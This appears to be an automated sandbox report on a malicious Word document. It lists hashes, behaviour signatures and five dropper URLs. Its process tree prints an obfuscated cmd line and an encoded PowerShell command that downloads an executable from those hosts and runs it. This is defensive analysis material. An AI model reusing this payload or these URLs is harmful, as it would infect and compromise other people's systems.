Analysis

  • max time kernel
    22s
  • max time network
    24s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    25-01-2021 10:39

General

  • Target

    Personal.doc

  • Size

    87KB

  • MD5

    f8a5c6272646fc0729544688c6f0b0fe

  • SHA1

    1b8a9743f694d2ae9c1368a2894e23dc39b3a7aa

  • SHA256

    4015f8b86ebef994d6aabc520b4773de60cd768b00b7c0123e14c7affa7ee0fe

  • SHA512

    b30ef2e8ea6bb7f856bdd7490a49b0043c1a114ee7269e8e607ea07e29ba723a05df82bf506b899238e73fb9cd5f1f2be2f51ed1fd527298edc8fd38a0ecfc39

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://samaotoyikama.com/t

exe.dropper

http://dellyetkiliservis.com/eK7

exe.dropper

http://musicalchorus.com.br/6Ez

exe.dropper

http://reserch.ir/FJS

exe.dropper

http://derinsunakliyat.com/I

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Personal.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Windows\SYSTEM32\CmD.exe
      CmD /V:On /C " SEt $ =powersTell -e JAB2AG0A.wA9AG:AZQB3AC0AbwBiAGoAZQBjAHQA[ABOAGUAdAAuAFcAZQBiAEMAbABpAGUAb1B0ADsAJAB)AHoASwA9ACcA)AB0AHQAcAA6AC8ALwBzAGEAbQBTAG8AdABvAHkA)QBrAGEAbQBTAC:AYwBvAG0ALwB0AEAA)AB0AHQAcAA6AC8ALwBkAGUAbABsAHkAZQB0AGsA)QBsAGkAcwBlAH[Ad1BpAHMAL1BjAG8AbQAvAGUASwA3AEAA)AB0AHQAcAA6AC8ALwB@AHUAcwBpAGMAYQBsAGMA)ABvAH[AdQBzAC:AYwBvAG0AL1BiAH[ALwA2AEUAe1BAAG1AdAB0AHAAO1AvAC8Ac1BlAHMAZQB\AGMA)AAuAGkAc1AvAEYAS1B.AEAA)AB0AHQAcAA6AC8ALwBkAGUAc1BpAG:AcwB(AG:AYQBrAGwA)QB5AGEAdAAuAGMAbwB@AC8ASQAnAC:AUwBwAGwA)QB0AC1AJwBAACcAKQA7ACQA)1BpAFUA[AA9ACAAJwA:ADUANAAnADsAJABLAG:AdwA9ACQAZQBuAHYAO1BwAHUAY1BsAGkAYwArACcA;AAnACsAJAB^%AGkAVQArACcAL1BlAH1AZQAnADsAZ1BvAH[AZQBTAGMA)AAoACQAQwB3AHUA[ABpAG:A[AAkAFoAe1BLACkAewB0AH[AeQB7ACQAd1B@AE8AL1BEAG8AdwBuAGwAbwBTAGQA#1BpAGwAZQAoACQAQwB3AHUALAA1ACQASwBuAHcAKQA7AFMAdABTAH[AdAA@AFAAc1BvAGMAZQBzAHMA[AAkAEsAb1B3ADsAY1B\AGUAYQBrADsAfQBjAGEAdABjAG1AewB9AH0A[AA1ACAA[AA1ACAA[AA1ACAA[AA1ACAA[AA1ACAA[AA1AA``&& set { =!$ :;=X!& SeT # =!{ :1=g!&& sEt ~ =!# :T=h!& SeT . =!~ :#=R!& SET _ =!. :%=q!&& Set _ =!_ :.=T!&& set * =!_ :)=a!& Set - =!* :`==!& seT - =!- ::=4!&& sET } =!- :@=t!& SET @ =!} :[=I!& sET # =!@ :(=1!& sET ' =!# :\=y!&& CALL %' % "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1364
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JAB2AG0ATwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABaAHoASwA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAbQBhAG8AdABvAHkAaQBrAGEAbQBhAC4AYwBvAG0ALwB0AEAAaAB0AHQAcAA6AC8ALwBkAGUAbABsAHkAZQB0AGsAaQBsAGkAcwBlAHIAdgBpAHMALgBjAG8AbQAvAGUASwA3AEAAaAB0AHQAcAA6AC8ALwBtAHUAcwBpAGMAYQBsAGMAaABvAHIAdQBzAC4AYwBvAG0ALgBiAHIALwA2AEUAegBAAGgAdAB0AHAAOgAvAC8AcgBlAHMAZQByAGMAaAAuAGkAcgAvAEYASgBTAEAAaAB0AHQAcAA6AC8ALwBkAGUAcgBpAG4AcwB1AG4AYQBrAGwAaQB5AGEAdAAuAGMAbwBtAC8ASQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAagBpAFUAIAA9ACAAJwA4ADUANAAnADsAJABLAG4AdwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABqAGkAVQArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwB3AHUAIABpAG4AIAAkAFoAegBLACkAewB0AHIAeQB7ACQAdgBtAE8ALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAQwB3AHUALAAgACQASwBuAHcAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAEsAbgB3ADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3740

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/652-2-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

    Filesize

    64KB

  • memory/652-3-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

    Filesize

    64KB

  • memory/652-4-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

    Filesize

    64KB

  • memory/652-5-0x00007FFC10600000-0x00007FFC10610000-memory.dmp

    Filesize

    64KB

  • memory/652-6-0x00007FFC2FC70000-0x00007FFC302A7000-memory.dmp

    Filesize

    6.2MB

  • memory/3740-9-0x00007FFC29430000-0x00007FFC29E1C000-memory.dmp

    Filesize

    9.9MB

  • memory/3740-10-0x00000262EBA20000-0x00000262EBA21000-memory.dmp

    Filesize

    4KB

  • memory/3740-11-0x00000262EBBD0000-0x00000262EBBD1000-memory.dmp

    Filesize

    4KB

  • memory/3740-12-0x00000262E9A50000-0x00000262E9A52000-memory.dmp

    Filesize

    8KB

  • memory/3740-13-0x00000262E9A53000-0x00000262E9A55000-memory.dmp

    Filesize

    8KB

  • memory/3740-14-0x00000262E9A56000-0x00000262E9A58000-memory.dmp

    Filesize

    8KB